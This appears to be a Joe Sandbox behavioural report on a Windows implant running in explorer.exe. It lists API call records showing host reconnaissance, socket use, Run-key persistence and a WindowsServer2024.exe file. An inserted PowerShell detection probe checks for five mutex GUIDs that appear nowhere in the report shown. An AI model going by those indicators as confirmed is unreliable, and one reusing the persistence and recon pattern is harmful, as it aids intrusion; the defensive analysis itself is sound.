• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$CloseHandle$Event$CreateLocalclosesocketshutdown$AllocCountExitFreeMutexProcessReleaseThreadTicklstrcpysetsockopt
                                                                            • String ID:
                                                                            • API String ID: 2113405211-0
                                                                            • Opcode ID: da3e3ea024555c63040bb402e8a4c16753c7aee5ae72899c74fb8080f737bd34
                                                                            • Instruction ID: 8bd92afe841ac248d0c038b4f67c3ea10ce6217f420084eb10279f3d6a3ef704
                                                                            • Opcode Fuzzy Hash: da3e3ea024555c63040bb402e8a4c16753c7aee5ae72899c74fb8080f737bd34
                                                                            • Instruction Fuzzy Hash: 6A91CA31114E8082F750DF65F86876EB3A1F7C4B55F205225E69A86AF8CFBCC999DB00

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1133 c059a0-c059c2 LocalAlloc 1134 c05b91 1133->1134 1135 c059c8-c059e0 LoadLibraryW 1133->1135 1136 c05b93-c05b9a 1134->1136 1137 c059e2-c059ef LocalFree 1135->1137 1138 c059f4-c05a11 GetProcAddress 1135->1138 1137->1136 1139 c05a13-c05a20 LocalFree 1138->1139 1140 c05a25-c05a4c call c091b0 RtlGetVersion 1138->1140 1139->1136 1143 c05a60-c05ad1 GetUserGeoID gethostname 1140->1143 1144 c05a4e-c05a5b LocalFree 1140->1144 1145 c05b86-c05b8b LocalFree 1143->1145 1146 c05ad7-c05af6 gethostbyname 1143->1146 1144->1136 1145->1134 1146->1145 1147 c05afc-c05b41 GetComputerNameExW 1146->1147 1147->1145 1148 c05b43-c05b6b GetUserNameW 1147->1148 1148->1145 1149 c05b6d-c05b84 GetTickCount64 1148->1149 1149->1136
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00C059B1
                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C055BD), ref: 00C059CF
                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C055BD), ref: 00C059E7
                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C055BD), ref: 00C05A00
                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C055BD), ref: 00C05A18
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$AddressAllocLibraryLoadProc
                                                                            • String ID: NTDLL.DLL$RtlGetVersion
                                                                            • API String ID: 2539306102-196638859
                                                                            • Opcode ID: 0d27c10a1c70186e5df40a47e7e09c762f60f04c80899255b6a6916c10d5c2a6
                                                                            • Instruction ID: a7af4d5e7d3aa7358ce35e473924c9d82eec28847d490c78b0781c7f6574929d
                                                                            • Opcode Fuzzy Hash: 0d27c10a1c70186e5df40a47e7e09c762f60f04c80899255b6a6916c10d5c2a6
                                                                            • Instruction Fuzzy Hash: 8651D536609A8487EB24DF15E4947AA73B0F78CB44F504625EA8E877A8DF7DC648CF00

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1150 be9ac0-be9ac5 1151 be9ac9-be9ae0 WaitForSingleObject 1150->1151 1152 be9ae6-be9aff SHGetKnownFolderPath 1151->1152 1153 be9c42-be9c48 1151->1153 1154 be9c3d 1152->1154 1155 be9b05-be9b20 LocalAlloc 1152->1155 1154->1151 1156 be9b26-be9b93 call c08378 CreateFileW 1155->1156 1157 be9c32-be9c37 CoTaskMemFree 1155->1157 1160 be9c14-be9c1a 1156->1160 1161 be9b95-be9b9c 1156->1161 1157->1154 1164 be9c1c-be9c21 CloseHandle 1160->1164 1165 be9c27-be9c2c LocalFree 1160->1165 1162 be9b9e-be9ba5 1161->1162 1163 be9bb1-be9bfa CloseHandle LocalFree CoTaskMemFree OpenEventW 1161->1163 1162->1160 1166 be9ba7-be9baf call befba0 1162->1166 1167 be9bfc-be9c0c SetEvent CloseHandle 1163->1167 1168 be9c12 1163->1168 1164->1165 1165->1157 1166->1160 1166->1163 1167->1168 1168->1153
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Free$CloseHandleLocal$EventTask$AllocCreateFileFolderKnownObjectOpenPathSingleWait
                                                                            • String ID: %s\%s$UNLOAD.TXT${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}
                                                                            • API String ID: 2734627627-2750632160
                                                                            • Opcode ID: 999adf7efb5de75e7f3e72abff956ff9d1ee3d9d4cdc8871909be47b3c46c388
                                                                            • Instruction ID: f3c3dffc51b9186bf3f036877d10c3b0c94ca67c3a67fd3c1a5cb0e91d603a7e
                                                                            • Opcode Fuzzy Hash: 999adf7efb5de75e7f3e72abff956ff9d1ee3d9d4cdc8871909be47b3c46c388
                                                                            • Instruction Fuzzy Hash: 0241EC31114A8182FB20AB55F86875EB3B1F7C57B5F600365E6AA46AE8CF7DC489CB00
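Added example, not part of the Joe Sandbox report and not code from the sample: a PowerShell probe that checks a live Windows host for the named kernel objects these two functions use. The mutex names are the five GUID string IDs of the function at 00BFD590 (OpenMutexW, then CreateMutexExW/CreateMutexW); the event name is the GUID the function at 00BE9AC0 passes to OpenEventW/SetEvent after writing UNLOAD.TXT. Assumptions: the report shows bare GUID names, so whether the objects live in the session-local or the Global\ namespace is unknown and both are tried; the known folder that UNLOAD.TXT is written to is not resolved in the report, so the folder list searched below is a guess.

```powershell
# Added example (not from the report or the sample). Run on a host you suspect is infected.
$MutexNames = @(
    '{04D458D6-7C6C-445F-AEAD-313D698F1F0A}',
    '{C3397568-8840-4085-8F6E-BC07C085BB3B}',
    '{C55632B1-A307-4128-9468-89792C176C2F}',
    '{CCEFB138-B038-41E1-AC53-171A4E58AB6A}',
    '{F95B00D0-572A-45B1-BD9B-5DB7078A4AC4}'
)
$EventNames = @('{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}')

# ASSUMPTION: the report does not say which KNOWNFOLDERID holds UNLOAD.TXT; these are guesses.
$UnloadFolders = @($env:APPDATA, $env:LOCALAPPDATA, $env:ProgramData, $env:TEMP)

function Test-NamedObject {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][ValidateSet('Mutex', 'Event')][string]$Kind
    )
    # Tries the bare name and the Global\ namespace (ASSUMPTION: scope not given in the report).
    # An access-denied error still proves the object exists, so it is reported as present.
    foreach ($candidate in @($Name, "Global\$Name")) {
        $state = $null
        try {
            $h = if ($Kind -eq 'Mutex') {
                [System.Threading.Mutex]::OpenExisting($candidate)
            } else {
                [System.Threading.EventWaitHandle]::OpenExisting($candidate)
            }
            $h.Dispose()
            $state = 'present'
        } catch [System.Threading.WaitHandleCannotBeOpenedException] {
            $state = $null
        } catch [System.UnauthorizedAccessException] {
            $state = 'present (access denied)'
        }
        if ($state) {
            return [pscustomobject]@{ Kind = $Kind; Name = $candidate; State = $state }
        }
    }
    [pscustomobject]@{ Kind = $Kind; Name = $Name; State = 'absent' }
}

$findings = @()
foreach ($n in $MutexNames) { $findings += Test-NamedObject -Name $n -Kind Mutex }
foreach ($n in $EventNames) { $findings += Test-NamedObject -Name $n -Kind Event }

# The unload trigger file: presence means someone (operator or responder) signalled the implant.
foreach ($dir in $UnloadFolders) {
    if ($dir -and (Test-Path (Join-Path $dir 'UNLOAD.TXT'))) {
        $findings += [pscustomobject]@{ Kind = 'File'; Name = (Join-Path $dir 'UNLOAD.TXT'); State = 'present' }
    }
}

$findings | Format-Table -AutoSize
if ($findings.State -like 'present*') {
    Write-Warning 'Named objects or files matching this sample are present on this host.'
}
```

A hit on any of the GUID mutexes is strong evidence that the implant's single-instance check has already run in this session; run the probe in each interactive session (the bare names are per-session) as well as once elevated for the Global\ variant.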
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameWindows_errno_invalid_parameter_noinfolstrcmpi
                                                                            • String ID: %s\explorer.exe
                                                                            • API String ID: 3179574994-2893622748
                                                                            • Opcode ID: d73407e702f3e9900842d0ef6f45a51916b541201d51ea320fa7185e205cb6b6
                                                                            • Instruction ID: 49e2911ffb1a95d549ef90c5813a480e11a0c0f206ba74999d402fab17e31369
                                                                            • Opcode Fuzzy Hash: d73407e702f3e9900842d0ef6f45a51916b541201d51ea320fa7185e205cb6b6
                                                                            • Instruction Fuzzy Hash: 5721EE3521899582E7309B11E85476A63A1FBCDB95F044235AA8E46779CF3CC58D8B00
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem_errno_invalid_parameter_noinfolstrcmpi
                                                                            • String ID: %s\svchost.exe
                                                                            • API String ID: 3414592467-1955667316
                                                                            • Opcode ID: 7ea0dabbf5ab00420ceef3eb4f7952fc56c8f4e5ffee73bec6ceeb712eb6e34c
                                                                            • Instruction ID: 241a198a066c0b496d55662c418c8edb96e8e25a41a31fefb93194ed66e2c42b
                                                                            • Opcode Fuzzy Hash: 7ea0dabbf5ab00420ceef3eb4f7952fc56c8f4e5ffee73bec6ceeb712eb6e34c
                                                                            • Instruction Fuzzy Hash: 9C21BC35618A8582E7309B15E85476A63A1FBCDB94F144235EA8E47B79CF3CC58D8700
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem_errno_invalid_parameter_noinfolstrcmpi
                                                                            • String ID: %s\cmd.exe
                                                                            • API String ID: 3414592467-923833829
                                                                            • Opcode ID: a48fb2a67d39b3c14bb10d2fca17362bdfa31f77588528880a644213d4eb659e
                                                                            • Instruction ID: 3cdd9e4faf7351f69c6de6400cf1a971554cd527466d2e0951c81791e9ba1269
                                                                            • Opcode Fuzzy Hash: a48fb2a67d39b3c14bb10d2fca17362bdfa31f77588528880a644213d4eb659e
                                                                            • Instruction Fuzzy Hash: 0B219C35618A8582E7309B15E85476A63A1FBCDB95F144235BA8E87B79CF3CC58D8700
                                                                            APIs
                                                                            • lstrlenW.KERNEL32 ref: 00C051ED
                                                                              • Part of subcall function 00C057B0: CoInitializeEx.COMBASE ref: 00C057DA
                                                                              • Part of subcall function 00C057B0: CoCreateGuid.COMBASE ref: 00C057ED
                                                                              • Part of subcall function 00C057B0: StringFromGUID2.COMBASE ref: 00C0580B
                                                                              • Part of subcall function 00C057B0: wsprintfA.USER32 ref: 00C0582D
                                                                              • Part of subcall function 00C057B0: LocalAlloc.KERNEL32 ref: 00C0583D
                                                                              • Part of subcall function 00C057B0: und_memcpy.LIBCMTD ref: 00C058B4
                                                                              • Part of subcall function 00C057B0: LocalFree.KERNEL32 ref: 00C058C1
                                                                              • Part of subcall function 00C057B0: CoUninitialize.COMBASE ref: 00C058C7
                                                                            • setsockopt.WS2_32 ref: 00C052EC
                                                                            • LocalFree.KERNEL32 ref: 00C05772
                                                                              • Part of subcall function 00C04740: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C0477F
                                                                              • Part of subcall function 00C059A0: LocalAlloc.KERNEL32 ref: 00C059B1
                                                                              • Part of subcall function 00C059A0: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C055BD), ref: 00C059CF
                                                                              • Part of subcall function 00C059A0: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C055BD), ref: 00C059E7
                                                                              • Part of subcall function 00C04C90: WSACreateEvent.WS2_32 ref: 00C04D29
                                                                            • LocalFree.KERNEL32 ref: 00C05764
                                                                              • Part of subcall function 00C04740: WSACreateEvent.WS2_32 ref: 00C047D9
                                                                            • CreateEventW.KERNEL32 ref: 00C056E0
                                                                            • WSAEventSelect.WS2_32 ref: 00C0570F
                                                                            • und_memcpy.LIBCMTD ref: 00C0573F
                                                                            • CloseHandle.KERNEL32 ref: 00C05756
                                                                            • shutdown.WS2_32 ref: 00C05785
                                                                            • closesocket.WS2_32 ref: 00C05793
                                                                              • Part of subcall function 00C05BB0: LocalAlloc.KERNEL32 ref: 00C05BC1
                                                                              • Part of subcall function 00C05BB0: lstrcpyW.KERNEL32 ref: 00C05C05
                                                                              • Part of subcall function 00C05BB0: GetModuleFileNameW.KERNEL32 ref: 00C05C25
                                                                              • Part of subcall function 00C05BB0: LocalFree.KERNEL32 ref: 00C05C34
                                                                              • Part of subcall function 00C04C90: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C04CCF
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$CreateEventTimer$Alloc$ChangeConcurrency::details::platform::__Queueund_memcpy$CloseFileFromGuidHandleInitializeLibraryLoadModuleNameSelectStringUninitializeclosesocketlstrcpylstrlensetsockoptshutdownwsprintf
                                                                            • String ID: 8
                                                                            • API String ID: 1160820747-4194326291
                                                                            • Opcode ID: 7744c4e00b3501b588a20af34e49b89a779c10dbf6e343e0beb01c25e0c734aa
                                                                            • Instruction ID: 5f8e9592dce9ea3b3738529d1fc90b12f0db066cd30410df8a0e144c40f081a8
                                                                            • Opcode Fuzzy Hash: 7744c4e00b3501b588a20af34e49b89a779c10dbf6e343e0beb01c25e0c734aa
                                                                            • Instruction Fuzzy Hash: 9ED1AF76218BC48AE7709B15E4447DAB7A4F389794F800526EB8D43BA8DF7DC688CF41
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister
                                                                            • String ID: {E5AC99DD-1415-4022-BE6C-AB9045565FB3}
                                                                            • API String ID: 1237952354-4116564367
                                                                            • Opcode ID: f849f3a4336449fa9ac388813d7629770bd7ad0e1afa6c6fa8222e9ffe5ab2fa
                                                                            • Instruction ID: 0c23c8af25dd7cbb2eb421f289002bdc37a48301cd2364ad36a6f6ea134050df
                                                                            • Opcode Fuzzy Hash: f849f3a4336449fa9ac388813d7629770bd7ad0e1afa6c6fa8222e9ffe5ab2fa
                                                                            • Instruction Fuzzy Hash: F2310771209B85C6F7609F24FCA4BAE77A0F384754F910225E68A83AA8DF7CC54DDB00
                                                                            APIs
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister
                                                                            • String ID: {6E456649-C3EE-4FD5-A6F9-EDD17ADE88F3}
                                                                            • API String ID: 1237952354-2008418920
                                                                            • Opcode ID: fca36edf4844be4939544b6fc52ab05d3dda8d3151a5665033656b6385d46372
                                                                            • Instruction ID: 35006e9b21b85394337f329680365bd23069965fde03fdb6d9873610f42d1c34
                                                                            • Opcode Fuzzy Hash: fca36edf4844be4939544b6fc52ab05d3dda8d3151a5665033656b6385d46372
                                                                            • Instruction Fuzzy Hash: A1311E31218B89D6F7209F24F864BAB77A1F785754F944225E68A43A75DFBCC58CCB00
                                                                            APIs
                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C0477F
                                                                              • Part of subcall function 00C03370: recv.WS2_32 ref: 00C0339C
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Timer$ChangeConcurrency::details::platform::__Queuerecv
                                                                            • String ID:
                                                                            • API String ID: 2709879575-0
                                                                            • Opcode ID: da0209bd51391d8aa85b3198e3e3358d7233d79bd4d519fc12b95e670b263445
                                                                            • Instruction ID: 83d697e78813107f1b4bdba27cacad96e6c99c3d874b475e331a1823d71e9ef3
                                                                            • Opcode Fuzzy Hash: da0209bd51391d8aa85b3198e3e3358d7233d79bd4d519fc12b95e670b263445
                                                                            • Instruction Fuzzy Hash: CAC1C6B26097C0CAE778CB16E4947ABB7A1F3C8744F108116DB9A87B98CB79C585CF01
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00BE909E
                                                                            • GetWindowsDirectoryW.KERNEL32 ref: 00BE90D7
                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00BE9110
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • StrCmpIW.SHLWAPI ref: 00BE91E8
                                                                            • StrCmpIW.SHLWAPI ref: 00BE91FF
                                                                            • StrCmpIW.SHLWAPI ref: 00BE9216
                                                                            Strings
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Directory$FileModuleNameSystemWindows_errno_invalid_parameter_noinfo
                                                                            • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
                                                                            • API String ID: 4125122012-2596767422
                                                                            • Opcode ID: f19a94bb52d6cc6a767c822c61deb552883d9bdc9095b174110caaa3aa5838c9
                                                                            • Instruction ID: fbc089c485cd715e5ec4c328fe8ea808f53f52ce80c186dd4905f3b6e6b147a7
                                                                            • Opcode Fuzzy Hash: f19a94bb52d6cc6a767c822c61deb552883d9bdc9095b174110caaa3aa5838c9
                                                                            • Instruction Fuzzy Hash: 1B41EC65318AC496EB70DB35E8547DB63A2F788740F808536868DC3A68EF3DC61CCB45
                                                                            APIs
                                                                            Strings
                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 00BEF3C5
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00BEF382
                                                                            • {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 00BEF3DD
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValue
                                                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run${AB1F3E47-AEF1-400E-A108-233A046C3A34}
                                                                            • API String ID: 849931509-2070010218
                                                                            • Opcode ID: 18b7775432b7624f2f27483179afdce4d241ea27d62cc07b0c6b43f001c51a34
                                                                            • Instruction ID: cd3c3c100e1d0851b37edd894ef269906bae014878bf57678ca96bc322995a29
                                                                            • Opcode Fuzzy Hash: 18b7775432b7624f2f27483179afdce4d241ea27d62cc07b0c6b43f001c51a34
                                                                            • Instruction Fuzzy Hash: EB01EC76611A82C2FA20DB11EC64BA96370FB95759F800722E99E426F8DF3CC648D704
APIs
• SHGetKnownFolderPath.SHELL32 ref: 00BEF587
• lstrlenW.KERNEL32 ref: 00BEF59A
• lstrlenW.KERNEL32 ref: 00BEF5B5
• LocalAlloc.KERNEL32 ref: 00BEF5DC
• CoTaskMemFree.COMBASE ref: 00BEF647
  • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
  • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
• lstrlenW.KERNEL32 ref: 00BEF620
• CoTaskMemFree.COMBASE ref: 00BEF635
Strings
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: lstrlen$FreeTask$AllocFolderKnownLocalPath_errno_invalid_parameter_noinfo
• String ID: %s\%s\
• API String ID: 2748012262-2168696002
• Opcode ID: 3c07c7a84a91b3dc76462a7bf42c2a39fbfc10208a3adc8cb45941fca1f6a139
• Instruction ID: 2588dcdad0a0becdb74550aeffa3b6fdf951421d716f9ebebe24506dcb593e13
• Opcode Fuzzy Hash: 3c07c7a84a91b3dc76462a7bf42c2a39fbfc10208a3adc8cb45941fca1f6a139
• Instruction Fuzzy Hash: B0310C32608A8486EB50DB55E85479EB7B1F7C9B90F504125EB8E83B68DF7CC949CB00
APIs
  • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
  • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
  • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
  • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
  • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
  • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
• GetFileAttributesW.KERNEL32 ref: 00BEFB60
  • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
  • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
• DeleteFileW.KERNEL32 ref: 00BEFB1A
• RemoveDirectoryW.KERNEL32 ref: 00BEFB2D
• LocalFree.KERNEL32 ref: 00BEFB40
• LocalFree.KERNEL32 ref: 00BEFB55
• GetFileAttributesW.KERNEL32 ref: 00BEFB77
Strings
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: FileFreeLocallstrlen$Attributes$AllocDeleteDirectoryFolderKnownPathRemoveTask_errno_invalid_parameter_noinfo
• String ID: %s%s$WindowsServer2024.exe
• API String ID: 2317434139-1924646418
• Opcode ID: e2da916fe652659acde8d770e6f922c2bcde9ecaa5741bb1a987aef6a0334bc1
• Instruction ID: 20be1c25420fa9aec94d791c65bb7fa99f2bb55b535c0a6e13f92045525d1178
• Opcode Fuzzy Hash: e2da916fe652659acde8d770e6f922c2bcde9ecaa5741bb1a987aef6a0334bc1
• Instruction Fuzzy Hash: 972121312249C591EB60DB35E8A87AE63A1F7C8B50F904632D69E836F8EF3CC549C700
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: LocalUninitialize$AllocCreateFreeFromGuidInitializeStringund_memcpywsprintf
• String ID:
• API String ID: 3539965953-0
• Opcode ID: 3eeff409c29a9f3811cd021c5063e1b720cbf15a1e6b5f811c1ca34045e3c13b
• Instruction ID: 7a25211f6fbcc34776c665881f3a5146fc8da1c79b2055b76a919f1a948da52a
• Opcode Fuzzy Hash: 3eeff409c29a9f3811cd021c5063e1b720cbf15a1e6b5f811c1ca34045e3c13b
• Instruction Fuzzy Hash: 81213221328AC482EF70DB65E45576F63A1F7C5B80F908525DA9A87AA8DF3CC54CCB40
APIs
Strings
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, xrefs: 00BE4A1A
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: FreeLocalObjectSingleWait
• String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
• API String ID: 2302018356-4002695862
• Opcode ID: bf519136ccd4abf063f206afac4ce43c27d6987f6cd99cde0c11dd423466edb2
